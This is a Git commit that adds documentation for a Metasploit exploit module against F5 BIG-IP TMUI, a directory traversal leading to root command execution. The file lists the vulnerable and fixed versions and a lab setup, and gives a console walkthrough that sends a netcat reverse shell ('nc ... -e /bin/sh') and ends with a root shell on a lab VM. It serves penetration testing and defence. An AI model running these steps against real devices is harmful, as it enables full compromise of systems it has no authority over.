dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Add module doc

This commit is contained in:
William Vu 2020-07-06 18:07:52 -05:00
parent c8176b803a
commit ac3b31a911
1 changed files with 108 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

108
documentation/modules/exploit/linux/http/f5_bigip_tmui_rce.md Normal file
View File

@ -0,0 +1,108 @@
## Vulnerable Application
### Description
This module exploits a directory traversal in F5's BIG-IP Traffic
Management User Interface (TMUI) to upload a shell script and execute
it as the root user.
Versions 11.6.1-11.6.5, 12.1.0-12.1.5, 13.1.0-13.1.3, 14.1.0-14.1.2,
15.0.0, and 15.1.0 are known to be vulnerable. Fixes were introduced
in 11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, and 15.1.0.4.
Tested on the VMware OVA release of 14.1.2.
### Setup
Download
[BIGIP-14.1.2-0.0.37.ALL-scsi.ova](https://downloads.f5.com/esd/serveDownload.jsp?path=/big-ip/big-ip_v14.x/14.1.2/english/virtual-edition/&sw=BIG-IP&pro=big-ip_v14.x&ver=14.1.2&container=Virtual-Edition&file=BIGIP-14.1.2-0.0.37.ALL-scsi.ova)
and import it into your desired virtualization software.
## Verification Steps
Follow [Setup](#setup) and [Scenarios](#scenarios).
## Targets
### 0
This executes a Unix command.
### 1
This uses a Linux dropper to execute code.
## Options
### WritableDir
Set this to a writable directory in which files will be dropped.
Defaults to `/tmp`.
## Scenarios
### F5 BIG-IP 14.1.2 in VMware Fusion
```
msf5 > use exploit/linux/http/f5_bigip_tmui_rce
[*] Using configured payload cmd/unix/reverse_netcat_gaping
msf5 exploit(linux/http/f5_bigip_tmui_rce) > options
Module options (exploit/linux/http/f5_bigip_tmui_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 443 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes Base path
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_netcat_gaping):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Unix Command
msf5 exploit(linux/http/f5_bigip_tmui_rce) > set rhosts 172.16.249.176
rhosts => 172.16.249.176
msf5 exploit(linux/http/f5_bigip_tmui_rce) > set lhost 172.16.249.1
lhost => 172.16.249.1
msf5 exploit(linux/http/f5_bigip_tmui_rce) > run
[+] nc 172.16.249.1 4444 -e /bin/sh
[*] Started reverse TCP handler on 172.16.249.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. Target is running BIG-IP 14.1.2.
[*] Creating alias list=bash
[+] Successfully created alias list=bash
[*] Executing Unix Command for cmd/unix/reverse_netcat_gaping
[*] Executing command: nc 172.16.249.1 4444 -e /bin/sh
[*] Uploading /tmp/lxoQO9DPOSpDiF8rP5yNfc4dVo67qsckbdaNc3ES3
[+] Successfully uploaded /tmp/lxoQO9DPOSpDiF8rP5yNfc4dVo67qsckbdaNc3ES3
[*] Executing /tmp/lxoQO9DPOSpDiF8rP5yNfc4dVo67qsckbdaNc3ES3
[*] Command shell session 1 opened (172.16.249.1:4444 -> 172.16.249.176:44736) at 2020-07-06 18:05:24 -0500
[+] Deleted /tmp/lxoQO9DPOSpDiF8rP5yNfc4dVo67qsckbdaNc3ES3
[*] Deleting alias list=bash
[+] Successfully deleted alias list=bash
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
uname -a
Linux localhost.localdomain 3.10.0-514.26.2.el7.ve.x86_64 #1 SMP Wed Aug 7 08:16:38 PDT 2019 x86_64 x86_64 x86_64 GNU/Linux
```